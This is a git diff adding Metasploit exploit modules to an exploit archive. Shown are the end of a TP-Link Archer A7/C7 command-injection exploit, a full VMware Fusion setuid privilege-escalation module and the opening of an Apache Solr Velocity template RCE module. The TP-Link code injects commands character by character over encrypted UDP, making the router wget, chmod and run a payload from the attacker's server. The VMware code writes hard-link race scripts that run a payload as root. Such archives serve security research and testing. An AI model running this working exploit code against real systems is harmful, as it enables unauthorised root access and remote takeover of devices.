(/usr/bin/tdpServer), running on + the router TP-Link Archer A7/C7 (AC1750), hardware version 5, MIPS Architecture, firmware version 190726. + The vulnerability can only be exploited by an attacker on the LAN side of the router, but the attacker does + not need any authentication to abuse it. After exploitation, an attacker will be able to execute any command + as root, including downloading and executing a binary from another host. + This vulnerability was discovered and exploited at Pwn2Own Tokyo 2019 by the Flashback team (Pedro Ribeiro + + Radek Domanski). + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Pedro Ribeiro ', # Vulnerability discovery and Metasploit module + 'Radek Domanski @RabbitPro' # Vulnerability discovery and Metasploit module + ], + 'References' => + [ + [ 'URL', 'https://www.thezdi.com/blog/2020/4/6/exploiting-the-tp-link-archer-c7-at-pwn2own-tokyo'], + [ 'URL', 'https://github.com/pedrib/PoC/blob/master/advisories/Pwn2Own/Tokyo_2019/lao_bomb/lao_bomb.md'], + [ 'URL', 'https://github.com/rdomanski/Exploits_and_Advisories/blob/master/advisories/Pwn2Own/Tokyo2019/lao_bomb.md'], + [ 'CVE', '2020-10882'], + [ 'CVE', '2020-10883'], + [ 'CVE', '2020-10884'], + [ 'ZDI', '20-334'], + [ 'ZDI', '20-335'], + [ 'ZDI', '20-336' ] + ], + 'Privileged' => true, + 'Platform' => 'linux', + 'Arch' => ARCH_MIPSBE, + 'Payload' => {}, + 'Stance' => Msf::Exploit::Stance::Aggressive, + 'DefaultOptions' => + { + 'PAYLOAD' => 'linux/mipsbe/shell_reverse_tcp', + 'WfsDelay' => 15, + }, + 'Targets' => + [ + [ 'TP-Link Archer A7/C7 (AC1750) v5 (firmware 190726)',{} ] + ], + 'DisclosureDate' => "Mar 25 2020", + 'DefaultTarget' => 0, + ) + ) + register_options( + [ + Opt::RPORT(20002) + ]) + + register_advanced_options( + [ + OptInt.new('MAX_WAIT', [true, 'Number of seconds to wait for payload download', 15]) + ]) + end + + def check + begin + res = send_request_cgi({ + 'uri' => '/webpages/app.1564127413977.manifest', + 'method' => 'GET', + 'rport' => 80 + }) + + if res && res.code == 200 + return Exploit::CheckCode::Vulnerable + end + rescue ::Rex::ConnectionError + pass + end + return Exploit::CheckCode::Unknown + end + + def calc_checksum(packet) + # reference table used to calculate the packet checksum + # used by tdpd_pkt_calc_checksum (0x4037f0) + # located at offset 0x0416e90 in the binary + reference_tbl = [0x00, 0x00, 0x00, 0x00, 0x77, 0x07, 0x30, 0x96, 0xee, + 0x0e, 0x61, 0x2c, 0x99, 0x09, 0x51, 0xba, 0x07, 0x6d, 0xc4, 0x19, 0x70, 0x6a, 0xf4, + 0x8f, 0xe9, 0x63, 0xa5, 0x35, 0x9e, 0x64, 0x95, 0xa3, 0x0e, 0xdb, 0x88, 0x32, 0x79, + 0xdc, 0xb8, 0xa4, 0xe0, 0xd5, 0xe9, 0x1e, 0x97, 0xd2, 0xd9, 0x88, 0x09, 0xb6, 0x4c, + 0x2b, 0x7e, 0xb1, 0x7c, 0xbd, 0xe7, 0xb8, 0x2d, 0x07, 0x90, 0xbf, 0x1d, 0x91, 0x1d, + 0xb7, 0x10, 0x64, 0x6a, 0xb0, 0x20, 0xf2, 0xf3, 0xb9, 0x71, 0x48, 0x84, 0xbe, 0x41, + 0xde, 0x1a, 0xda, 0xd4, 0x7d, 0x6d, 0xdd, 0xe4, 0xeb, 0xf4, 0xd4, 0xb5, 0x51, 0x83, + 0xd3, 0x85, 0xc7, 0x13, 0x6c, 0x98, 0x56, 0x64, 0x6b, 0xa8, 0xc0, 0xfd, 0x62, 0xf9, + 0x7a, 0x8a, 0x65, 0xc9, 0xec, 0x14, 0x01, 0x5c, 0x4f, 0x63, 0x06, 0x6c, 0xd9, 0xfa, + 0x0f, 0x3d, 0x63, 0x8d, 0x08, 0x0d, 0xf5, 0x3b, 0x6e, 0x20, 0xc8, 0x4c, 0x69, 0x10, + 0x5e, 0xd5, 0x60, 0x41, 0xe4, 0xa2, 0x67, 0x71, 0x72, 0x3c, 0x03, 0xe4, 0xd1, 0x4b, + 0x04, 0xd4, 0x47, 0xd2, 0x0d, 0x85, 0xfd, 0xa5, 0x0a, 0xb5, 0x6b, 0x35, 0xb5, 0xa8, + 0xfa, 0x42, 0xb2, 0x98, 0x6c, 0xdb, 0xbb, 0xc9, 0xd6, 0xac, 0xbc, 0xf9, 0x40, 0x32, + 0xd8, 0x6c, 0xe3, 0x45, 0xdf, 0x5c, 0x75, 0xdc, 0xd6, 0x0d, 0xcf, 0xab, 0xd1, 0x3d, + 0x59, 0x26, 0xd9, 0x30, 0xac, 0x51, 0xde, 0x00, 0x3a, 0xc8, 0xd7, 0x51, 0x80, 0xbf, + 0xd0, 0x61, 0x16, 0x21, 0xb4, 0xf4, 0xb5, 0x56, 0xb3, 0xc4, 0x23, 0xcf, 0xba, 0x95, + 0x99, 0xb8, 0xbd, 0xa5, 0x0f, 0x28, 0x02, 0xb8, 0x9e, 0x5f, 0x05, 0x88, 0x08, 0xc6, + 0x0c, 0xd9, 0xb2, 0xb1, 0x0b, 0xe9, 0x24, 0x2f, 0x6f, 0x7c, 0x87, 0x58, 0x68, 0x4c, + 0x11, 0xc1, 0x61, 0x1d, 0xab, 0xb6, 0x66, 0x2d, 0x3d, 0x76, 0xdc, 0x41, 0x90, 0x01, + 0xdb, 0x71, 0x06, 0x98, 0xd2, 0x20, 0xbc, 0xef, 0xd5, 0x10, 0x2a, 0x71, 0xb1, 0x85, + 0x89, 0x06, 0xb6, 0xb5, 0x1f, 0x9f, 0xbf, 0xe4, 0xa5, 0xe8, 0xb8, 0xd4, 0x33, 0x78, + 0x07, 0xc9, 0xa2, 0x0f, 0x00, 0xf9, 0x34, 0x96, 0x09, 0xa8, 0x8e, 0xe1, 0x0e, 0x98, + 0x18, 0x7f, 0x6a, 0x0d, 0xbb, 0x08, 0x6d, 0x3d, 0x2d, 0x91, 0x64, 0x6c, 0x97, 0xe6, + 0x63, 0x5c, 0x01, 0x6b, 0x6b, 0x51, 0xf4, 0x1c, 0x6c, 0x61, 0x62, 0x85, 0x65, 0x30, + 0xd8, 0xf2, 0x62, 0x00, 0x4e, 0x6c, 0x06, 0x95, 0xed, 0x1b, 0x01, 0xa5, 0x7b, 0x82, + 0x08, 0xf4, 0xc1, 0xf5, 0x0f, 0xc4, 0x57, 0x65, 0xb0, 0xd9, 0xc6, 0x12, 0xb7, 0xe9, + 0x50, 0x8b, 0xbe, 0xb8, 0xea, 0xfc, 0xb9, 0x88, 0x7c, 0x62, 0xdd, 0x1d, 0xdf, 0x15, + 0xda, 0x2d, 0x49, 0x8c, 0xd3, 0x7c, 0xf3, 0xfb, 0xd4, 0x4c, 0x65, 0x4d, 0xb2, 0x61, + 0x58, 0x3a, 0xb5, 0x51, 0xce, 0xa3, 0xbc, 0x00, 0x74, 0xd4, 0xbb, 0x30, 0xe2, 0x4a, + 0xdf, 0xa5, 0x41, 0x3d, 0xd8, 0x95, 0xd7, 0xa4, 0xd1, 0xc4, 0x6d, 0xd3, 0xd6, 0xf4, + 0xfb, 0x43, 0x69, 0xe9, 0x6a, 0x34, 0x6e, 0xd9, 0xfc, 0xad, 0x67, 0x88, 0x46, 0xda, + 0x60, 0xb8, 0xd0, 0x44, 0x04, 0x2d, 0x73, 0x33, 0x03, 0x1d, 0xe5, 0xaa, 0x0a, 0x4c, + 0x5f, 0xdd, 0x0d, 0x7c, 0xc9, 0x50, 0x05, 0x71, 0x3c, 0x27, 0x02, 0x41, 0xaa, 0xbe, + 0x0b, 0x10, 0x10, 0xc9, 0x0c, 0x20, 0x86, 0x57, 0x68, 0xb5, 0x25, 0x20, 0x6f, 0x85, + 0xb3, 0xb9, 0x66, 0xd4, 0x09, 0xce, 0x61, 0xe4, 0x9f, 0x5e, 0xde, 0xf9, 0x0e, 0x29, + 0xd9, 0xc9, 0x98, 0xb0, 0xd0, 0x98, 0x22, 0xc7, 0xd7, 0xa8, 0xb4, 0x59, 0xb3, 0x3d, + 0x17, 0x2e, 0xb4, 0x0d, 0x81, 0xb7, 0xbd, 0x5c, 0x3b, 0xc0, 0xba, 0x6c, 0xad, 0xed, + 0xb8, 0x83, 0x20, 0x9a, 0xbf, 0xb3, 0xb6, 0x03, 0xb6, 0xe2, 0x0c, 0x74, 0xb1, 0xd2, + 0x9a, 0xea, 0xd5, 0x47, 0x39, 0x9d, 0xd2, 0x77, 0xaf, 0x04, 0xdb, 0x26, 0x15, 0x73, + 0xdc, 0x16, 0x83, 0xe3, 0x63, 0x0b, 0x12, 0x94, 0x64, 0x3b, 0x84, 0x0d, 0x6d, 0x6a, + 0x3e, 0x7a, 0x6a, 0x5a, 0xa8, 0xe4, 0x0e, 0xcf, 0x0b, 0x93, 0x09, 0xff, 0x9d, 0x0a, + 0x00, 0xae, 0x27, 0x7d, 0x07, 0x9e, 0xb1, 0xf0, 0x0f, 0x93, 0x44, 0x87, 0x08, 0xa3, + 0xd2, 0x1e, 0x01, 0xf2, 0x68, 0x69, 0x06, 0xc2, 0xfe, 0xf7, 0x62, 0x57, 0x5d, 0x80, + 0x65, 0x67, 0xcb, 0x19, 0x6c, 0x36, 0x71, 0x6e, 0x6b, 0x06, 0xe7, 0xfe, 0xd4, 0x1b, + 0x76, 0x89, 0xd3, 0x2b, 0xe0, 0x10, 0xda, 0x7a, 0x5a, 0x67, 0xdd, 0x4a, 0xcc, 0xf9, + 0xb9, 0xdf, 0x6f, 0x8e, 0xbe, 0xef, 0xf9, 0x17, 0xb7, 0xbe, 0x43, 0x60, 0xb0, 0x8e, + 0xd5, 0xd6, 0xd6, 0xa3, 0xe8, 0xa1, 0xd1, 0x93, 0x7e, 0x38, 0xd8, 0xc2, 0xc4, 0x4f, + 0xdf, 0xf2, 0x52, 0xd1, 0xbb, 0x67, 0xf1, 0xa6, 0xbc, 0x57, 0x67, 0x3f, 0xb5, 0x06, + 0xdd, 0x48, 0xb2, 0x36, 0x4b, 0xd8, 0x0d, 0x2b, 0xda, 0xaf, 0x0a, 0x1b, 0x4c, 0x36, + 0x03, 0x4a, 0xf6, 0x41, 0x04, 0x7a, 0x60, 0xdf, 0x60, 0xef, 0xc3, 0xa8, 0x67, 0xdf, + 0x55, 0x31, 0x6e, 0x8e, 0xef, 0x46, 0x69, 0xbe, 0x79, 0xcb, 0x61, 0xb3, 0x8c, 0xbc, + 0x66, 0x83, 0x1a, 0x25, 0x6f, 0xd2, 0xa0, 0x52, 0x68, 0xe2, 0x36, 0xcc, 0x0c, 0x77, + 0x95, 0xbb, 0x0b, 0x47, 0x03, 0x22, 0x02, 0x16, 0xb9, 0x55, 0x05, 0x26, 0x2f, 0xc5, + 0xba, 0x3b, 0xbe, 0xb2, 0xbd, 0x0b, 0x28, 0x2b, 0xb4, 0x5a, 0x92, 0x5c, 0xb3, 0x6a, + 0x04, 0xc2, 0xd7, 0xff, 0xa7, 0xb5, 0xd0, 0xcf, 0x31, 0x2c, 0xd9, 0x9e, 0x8b, 0x5b, + 0xde, 0xae, 0x1d, 0x9b, 0x64, 0xc2, 0xb0, 0xec, 0x63, 0xf2, 0x26, 0x75, 0x6a, 0xa3, + 0x9c, 0x02, 0x6d, 0x93, 0x0a, 0x9c, 0x09, 0x06, 0xa9, 0xeb, 0x0e, 0x36, 0x3f, 0x72, + 0x07, 0x67, 0x85, 0x05, 0x00, 0x57, 0x13, 0x95, 0xbf, 0x4a, 0x82, 0xe2, 0xb8, 0x7a, + 0x14, 0x7b, 0xb1, 0x2b, 0xae, 0x0c, 0xb6, 0x1b, 0x38, 0x92, 0xd2, 0x8e, 0x9b, 0xe5, + 0xd5, 0xbe, 0x0d, 0x7c, 0xdc, 0xef, 0xb7, 0x0b, 0xdb, 0xdf, 0x21, 0x86, 0xd3, 0xd2, + 0xd4, 0xf1, 0xd4, 0xe2, 0x42, 0x68, 0xdd, 0xb3, 0xf8, 0x1f, 0xda, 0x83, 0x6e, 0x81, + 0xbe, 0x16, 0xcd, 0xf6, 0xb9, 0x26, 0x5b, 0x6f, 0xb0, 0x77, 0xe1, 0x18, 0xb7, 0x47, + 0x77, 0x88, 0x08, 0x5a, 0xe6, 0xff, 0x0f, 0x6a, 0x70, 0x66, 0x06, 0x3b, 0xca, 0x11, + 0x01, 0x0b, 0x5c, 0x8f, 0x65, 0x9e, 0xff, 0xf8, 0x62, 0xae, 0x69, 0x61, 0x6b, 0xff, + 0xd3, 0x16, 0x6c, 0xcf, 0x45, 0xa0, 0x0a, 0xe2, 0x78, 0xd7, 0x0d, 0xd2, 0xee, 0x4e, + 0x04, 0x83, 0x54, 0x39, 0x03, 0xb3, 0xc2, 0xa7, 0x67, 0x26, 0x61, 0xd0, 0x60, 0x16, + 0xf7, 0x49, 0x69, 0x47, 0x4d, 0x3e, 0x6e, 0x77, 0xdb, 0xae, 0xd1, 0x6a, 0x4a, 0xd9, + 0xd6, 0x5a, 0xdc, 0x40, 0xdf, 0x0b, 0x66, 0x37, 0xd8, 0x3b, 0xf0, 0xa9, 0xbc, 0xae, + 0x53, 0xde, 0xbb, 0x9e, 0xc5, 0x47, 0xb2, 0xcf, 0x7f, 0x30, 0xb5, 0xff, 0xe9, 0xbd, + 0xbd, 0xf2, 0x1c, 0xca, 0xba, 0xc2, 0x8a, 0x53, 0xb3, 0x93, 0x30, 0x24, 0xb4, 0xa3, + 0xa6, 0xba, 0xd0, 0x36, 0x05, 0xcd, 0xd7, 0x06, 0x93, 0x54, 0xde, 0x57, 0x29, 0x23, + 0xd9, 0x67, 0xbf, 0xb3, 0x66, 0x7a, 0x2e, 0xc4, 0x61, 0x4a, 0xb8, 0x5d, 0x68, 0x1b, + 0x02, 0x2a, 0x6f, 0x2b, 0x94, 0xb4, 0x0b, 0xbe, 0x37, 0xc3, 0x0c, 0x8e, 0xa1, 0x5a, + 0x05, 0xdf, 0x1b, 0x2d, 0x02, 0xef, 0x8d] + + res = 0xffffffff + + # main checksum calculation + packet.each_entry { |c| + index = ((c ^ res) & 0xff) * 4 + # .reverse is needed as the target is big endian + ref = (reference_tbl[index..index+3].reverse.pack('C*').unpack('L').first) + res = ref ^ (res >> 8) + } + + checksum = ~res + checksum_s = [(checksum)].pack('I>').force_encoding("ascii") + + # convert back to string + packet = packet.pack('C*').force_encoding('ascii') + + # and replace the checksum + packet[12] = checksum_s[0] + packet[13] = checksum_s[1] + packet[14] = checksum_s[2] + packet[15] = checksum_s[3] + + packet + end + + def aes_encrypt(plaintext) + # Function encrypts perfectly 16 bytes aligned payload + + if (plaintext.length % 16 != 0) + return + end + + cipher = OpenSSL::Cipher.new 'AES-128-CBC' + # in the original C code the key and IV are 256 bits long... but they still use AES-128 + iv = "1234567890abcdef" + key = "TPONEMESH_Kf!xn?" + encrypted = '' + cipher.encrypt + cipher.iv = iv + cipher.key = key + + # Take each 16 bytes block and encrypt it + plaintext.scan(/.{1,16}/) { |block| + encrypted += cipher.update(block) + } + + encrypted + end + + def create_injection(c) + # Template for the command injection + # The injection happens at "slave_mac" (read advisory for details) + # The payload will have to be padded to exactly 16 bytes to ensure reliability between different OpenSSL versions. + + # This will fail if we send a command with single quotes (') + # ... but that's not a problem for this module, since we don't use them for our command. + # It might also fail with double quotes (") since this will break the JSON... + inject = "\';printf \'#{c}\'>>#{@cmd_file}\'" + + template = "{\"method\":\"slave_key_offer\",\"data\":{"\ + "\"group_id\":\"#{rand_text_numeric(1..3)}\","\ + "\"ip\":\"#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}.#{rand_text_numeric(1..3)}\","\ + "\"slave_mac\":\"%{INJECTION}\","\ + "\"slave_private_account\":\"#{rand_text_alpha(5..13)}\","\ + "\"slave_private_password\":\"#{rand_text_alpha(5..13)}\","\ + "\"want_to_join\":false,"\ + "\"model\":\"#{rand_text_alpha(5..13)}\","\ + "\"product_type\":\"#{rand_text_alpha(5..13)}\","\ + "\"operation_mode\":\"A%{PADDING}\"}}" + + # This is required to calculate exact template length without replace flags + template_len = template.length - '%{INJECTION}'.length - '%{PADDING}'.length + # This has to be initialized to cover the situation when no padding is needed + pad = '' + padding = rand_text_alpha(16) + + template_len += inject.length + + # Calculate pad if padding is needed + if (template_len % 16 != 0) + pad = padding[0..15-(template_len % 16)] + end + + # Here the final payload is created + template % {INJECTION:"#{inject}", PADDING:"#{pad}"} + end + + def update_len_field(packet, payload_length) + new_packet = packet[0..3] + new_packet += [payload_length].pack("S>") + new_packet += packet[6..-1] + end + + def exec_cmd_file(packet) + # This function handles special action of exec + # Returns new complete tpdp packet + inject = "\';sh #{@cmd_file}\'" + payload = create_injection(inject) + + ciphertext = aes_encrypt(payload) + if not ciphertext + fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!") + end + + new_packet = packet[0..15] + new_packet += ciphertext + new_packet = update_len_field(new_packet, ciphertext.length) + + calc_checksum(new_packet.bytes) + end + + # Handle incoming requests from the router + def on_request_uri(cli, request) + print_good("#{peer} - Sending executable to the router") + print_good("#{peer} - Sit back and relax, Shelly will come visit soon!") + send_response(cli, @payload_exe) + @payload_sent = true + end + + def exploit + if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") + fail_with(Failure::Unreachable, "#{peer} - Please specify the LAN IP address of this computer in SRVHOST") + end + + if datastore['SSL'] + fail_with(Failure::Unknown, "SSL is not supported on this target, please disable it") + end + + print_status("Attempting to exploit #{target.name}") + + tpdp_packet_template = + [0x01].pack('C*') + # packet version, fixed to 1 + [0xf0].pack('C*') + # set packet type to 0xf0 (onemesh) + [0x07].pack('S>*') + # onemesh opcode, used by the onemesh_main switch table + [0x00].pack('S>*') + # packet len + [0x01].pack('C*') + # some flag, has to be 1 to enter the vulnerable onemesh function + [0x00].pack('C*') + # dunno what this is + [rand(0xff),rand(0xff),rand(0xff),rand(0xff)].pack('C*') + # serial number, can by any value + [0x5A,0x6B,0x7C,0x8D].pack('C*') # Checksum placeholder + + srv_host = datastore['SRVHOST'] + srv_port = datastore['SRVPORT'] + @cmd_file = rand_text_alpha_lower(1) + + # generate our payload executable + @payload_exe = generate_payload_exe + + # Command that will download @payload_exe and execute it + download_cmd = "wget http://#{srv_host}:#{srv_port}/#{@cmd_file};chmod +x #{@cmd_file};./#{@cmd_file}" + + http_service = 'http://' + srv_host + ':' + srv_port.to_s + print_status("Starting up our web service on #{http_service} ...") + start_service({'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => "/#{@cmd_file}" + }}) + + print_status("#{peer} - Connecting to the target") + connect_udp + + print_status("#{peer} - Sending command file byte by byte") + print_status("#{peer} - Command: #{download_cmd}") + mod = download_cmd.length / 5 + + download_cmd.each_char.with_index { |c, index| + # Generate payload + payload = create_injection(c) + if not payload + fail_with(Failure::Unknown, "#{peer} - Failed to setup download command!") + end + + # Encrypt payload + ciphertext = aes_encrypt(payload) + if not ciphertext + fail_with(Failure::Unknown, "#{peer} - Failed to encrypt packet!") + end + + tpdp_packet = tpdp_packet_template.dup + tpdp_packet += ciphertext + tpdp_packet = update_len_field(tpdp_packet, ciphertext.length) + tpdp_packet = calc_checksum(tpdp_packet.bytes) + + udp_sock.put(tpdp_packet) + + # Sleep to make sure the payload is processed by a target + Rex.sleep(1) + + # Print progress + if ((index+1) % mod == 0) + percentage = 20 * ((index+1) / mod) + # very advanced mathemathics in use here to show the progress bar + print_status("#{peer} - [0%]=#{' =' * ((percentage*2/10-1)-1)}>#{' -'*(20-(percentage*2/10))}[100%]") + if percentage == 100 + # a bit of cheating to get the last char done right + index = -2 + end + #print_status("#{peer} - #{download_cmd[0..index+1]}#{'-' * (download_cmd[index+1..-1].length-1)}") + end + } + + # Send the exec command. From here we should receive the connection + print_status("#{peer} - Command file sent, attempting to execute...") + tpdp_packet = exec_cmd_file(tpdp_packet_template.dup) + udp_sock.put(tpdp_packet) + + timeout = 0 + while not @payload_sent + Rex.sleep(1) + timeout += 1 + if timeout == datastore['MAX_WAIT'].to_i + fail_with(Failure::Unknown, "#{peer} - Timeout reached! Payload was not downloaded :(") + end + end + + disconnect_udp + end +end \ No newline at end of file diff --git a/exploits/macos/local/48337.rb b/exploits/macos/local/48337.rb new file mode 100755 index 000000000..ceca93f31 --- /dev/null +++ b/exploits/macos/local/48337.rb @@ -0,0 +1,240 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Post::OSX::Priv + include Msf::Post::File + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'VMware Fusion USB Arbitrator Setuid Privilege Escalation', + 'Description' => %q( + This exploits an improper use of setuid binaries within VMware Fusion 10.1.3 - 11.5.3. + The Open VMware USB Arbitrator Service can be launched outide of its standard path + which allows loading of an attacker controlled binary. By creating a payload in the + user home directory in a specific folder, and creating a hard link to the 'Open VMware + USB Arbitrator Service' binary, we're able to launch it temporarily to start our payload + with an effective UID of 0. + @jeffball55 discovered an incomplete patch in 11.5.3 with a TOCTOU race. + Successfully tested against 10.1.6, 11.5.1, 11.5.2, and 11.5.3. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 'h00die', # msf module + 'Dhanesh Kizhakkinan', # discovery + 'Rich Mirch', # edb module + 'jeffball ', # 11.5.3 exploit + 'grimm' + ], + 'Platform' => [ 'osx' ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'Targets' => [[ 'Auto', {} ]], + 'Privileged' => true, + 'References' => + [ + [ 'CVE', '2020-3950' ], + [ 'EDB', '48235' ], + [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2020-0005.html' ], + [ 'URL', 'https://twitter.com/jeffball55/status/1242530508053110785?s=20' ], + [ 'URL', 'https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.03.17-vmware-fusion/notes.txt' ] + ], + 'DisclosureDate' => 'Mar 17 2020', + 'DefaultOptions' => + { + 'PAYLOAD' => 'osx/x64/meterpreter_reverse_tcp', + 'WfsDelay' => 15 + } + ) + ) + + register_options [ + OptInt.new('MAXATTEMPTS', [true, 'Maximum attempts to win race for 11.5.3', 75]) + ] + + register_advanced_options [ + OptBool.new('ForceExploit', [false, 'Override check result', false]) + ] + end + + def open_usb_service + 'Open VMware USB Arbitrator Service' + end + + def usb_service + 'VMware USB Arbitrator Service' + end + + def get_home_dir + home = cmd_exec 'echo ~' + if home.blank? + fail_with Failure::BadConfig, 'Unable to determine home dir for shell.' + end + home + end + + def content_dir + "#{get_home_dir}/Contents" + end + + def base_dir + "#{content_dir}/Library/services/" + end + + def kill_process(executable) + pid_kill = cmd_exec %(ps ax | grep #{executable} | grep -v grep | awk '{print "kill -9 " $1}') + cmd_exec pid_kill + end + + def get_version + # Thanks to @ddouhine on github for this answer! + version_raw = cmd_exec "plutil -p '/Applications/VMware Fusion.app/Contents/Info.plist' | grep CFBundleShortVersionString" + /=> "(?\d{0,2}\.\d{0,2}\.\d{0,2})"/ =~ version_raw #supposed 11.x is also vulnerable, but everyone whos tested shows 11.5.1 or 11.5.2 + if version_raw.blank? + fail_with Failure::BadConfig, 'Unable to determine VMware Fusion version. Set ForceExploit to override.' + end + Gem::Version.new(version) + end + + def pre_11_5_3 + # Upload payload executable & chmod + payload_filename = "#{base_dir}#{usb_service}" + print_status "Uploading Payload: #{payload_filename}" + write_file payload_filename, generate_payload_exe + chmod payload_filename, 0o755 + register_file_for_cleanup payload_filename + + # create folder structure and hard link to the original binary + root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later + link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/" + cmd_exec "mkdir -p #{link_folder}" + cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'" + print_status "Created folder (#{link_folder}) and link" + + print_status 'Starting USB Service (5 sec pause)' + # XXX: The ; used by cmd_exec will interfere with &, so pad it with : + cmd_exec "cd #{link_folder}; '#{link_folder}/#{open_usb_service}' & :" + Rex.sleep 5 # give time for the service to execute our payload + print_status 'Killing service' + cmd_exec "pkill '#{open_usb_service}'" + print_status "Deleting #{root_link_folder}" + rm_rf root_link_folder + end + + def exactly_11_5_3 + # Upload payload executable & chmod + payload_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}" + print_status "Uploading Payload to #{payload_name}" + write_file payload_name, generate_payload_exe + chmod payload_name, 0o755 + #create race with codesign check + root_link_folder = "#{get_home_dir}/#{rand_text_alphanumeric(2..5)}" # for cleanup later + link_folder = "#{root_link_folder}/#{rand_text_alphanumeric(2..5)}/#{rand_text_alphanumeric(2..5)}/" + print_status 'Uploading race condition executable.' + race = <<~EOF + #!/bin/sh + while [ "1" = "1" ]; do + ln -f '/Applications/VMware Fusion.app/Contents/Library/services/#{usb_service}' '#{base_dir}#{usb_service}' + ln -f '#{payload_name}' '#{base_dir}#{usb_service}' + done + EOF + racer_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}" + upload_and_chmodx racer_name, race + register_file_for_cleanup racer_name + register_dirs_for_cleanup root_link_folder + # create the hard link + print_status "Creating folder (#{link_folder}) and link" + cmd_exec "mkdir -p #{link_folder}" + cmd_exec "ln '/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}' '#{link_folder}#{open_usb_service}'" + + # create the launcher to start the racer and keep launching our service to attempt to win + launcher = <<~EOF + #!/bin/sh + #{racer_name} & + for i in {1..#{datastore['MAXATTEMPTS']}} + do + echo "attempt $i"; + '#{link_folder}#{open_usb_service}' + done + EOF + runner_name = "#{base_dir}#{rand_text_alphanumeric(5..10)}" + upload_and_chmodx runner_name, launcher + register_file_for_cleanup runner_name + + print_status "Launching Exploit #{runner_name} (sleeping 15sec)" + # XXX: The ; used by cmd_exec will interfere with &, so pad it with : + results = cmd_exec "#{runner_name} & :" + Rex.sleep 15 # give time for the service to execute our payload + vprint_status results + + print_status 'Exploit Finished, killing scripts.' + kill_process racer_name + kill_process runner_name # in theory should be killed already but just in case + kill_process "'#{link_folder}#{open_usb_service}'" + # kill_process 'ln' a rogue ln -f may mess us up, but killing them seemed to be unreliable and mark the exploit as failed. + # above caused: [-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_process_execute: Operation failed: Unknown error + # rm_rf base_dir # this always fails. Leaving it here as a note that when things dont kill well, can't delete the folder + end + + def check + unless exists? "/Applications/VMware Fusion.app/Contents/Library/services/#{open_usb_service}" + print_bad "'#{open_usb_service}' binary missing" + return CheckCode::Safe + end + version = get_version + if version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.3')) + vprint_good "Vmware Fusion #{version} is exploitable" + else + print_bad "VMware Fusion #{version} is NOT exploitable" + return CheckCode::Safe + end + CheckCode::Appears + end + + def exploit + # First check the system is vulnerable, or the user wants to run regardless + unless check == CheckCode::Appears + unless datastore['ForceExploit'] + fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' + end + print_warning 'Target does not appear to be vulnerable' + end + + # Check if we're already root + if is_root? + unless datastore['ForceExploit'] + fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override' + end + end + + # Make sure we can write our payload to the remote system + rm_rf content_dir # live dangerously. + if directory? content_dir + fail_with Filure::BadConfig, "#{content_dir} exists. Unable to delete automatically. Please delete or exploit will fail." + end + cmd_exec "mkdir -p #{base_dir}" + register_dirs_for_cleanup content_dir + unless writable? base_dir + fail_with Failure::BadConfig, "#{base_dir} is not writable." + end + + version = get_version + if version == Gem::Version.new('11.5.3') + vprint_status 'Using 11.5.3 exploit' + exactly_11_5_3 + elsif version.between?(Gem::Version.new('10.1.3'), Gem::Version.new('11.5.2')) + vprint_status 'Using pre-11.5.3 exploit' + pre_11_5_3 + end + rm_rf content_dir # live dangerously. + end +end \ No newline at end of file diff --git a/exploits/multiple/remote/48338.rb b/exploits/multiple/remote/48338.rb new file mode 100755 index 000000000..f2080902b --- /dev/null +++ b/exploits/multiple/remote/48338.rb @@ -0,0 +1,504 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core/exploit/powershell' + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::CmdStager + include Msf::Exploit::Powershell + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'Apache Solr Remote Code Execution via Velocity Template', + 'Description' => %q( + This module exploits a vulnerability in Apache Solr <= 8.3.0 which allows remote code execution via a custom + Velocity template. Currently, this module only supports Solr basic authentication. + + From the Tenable advisory: + An attacker could target a vulnerable Apache Solr instance by first identifying a list + of Solr core names. Once the core names have been identified, an attacker can send a specially crafted + HTTP POST request to the Config API to toggle the params resource loader value for the Velocity Response + Writer in the solrconfig.xml file to true. Enabling this parameter would allow an attacker to use the Velocity + template parameter in a specially crafted Solr request, leading to RCE. + ), + 'License' => MSF_LICENSE, + 'Author' => + [ + 's00py', # Discovery and PoC + 'jas502n', # exploit code on Github + 'AleWong', # ExploitDB contribution, and exploit code on Github + 'Imran E. Dawoodjee ' # Metasploit module + ], + 'References' => + [ + [ 'EDB', '47572' ], + [ 'CVE', '2019-17558' ], + [ 'URL', 'https://www.tenable.com/blog/apache-solr-vulnerable-to-remote-code-execution-zero-day-vulnerability'], + [ 'URL', 'https://www.huaweicloud.com/en-us/notice/2018/20191104170849387.html'], + [ 'URL', 'https://gist.github.com/s00py/a1ba36a3689fa13759ff910e179fc133/'], + [ 'URL', 'https://github.com/jas502n/solr_rce'], + [ 'URL', 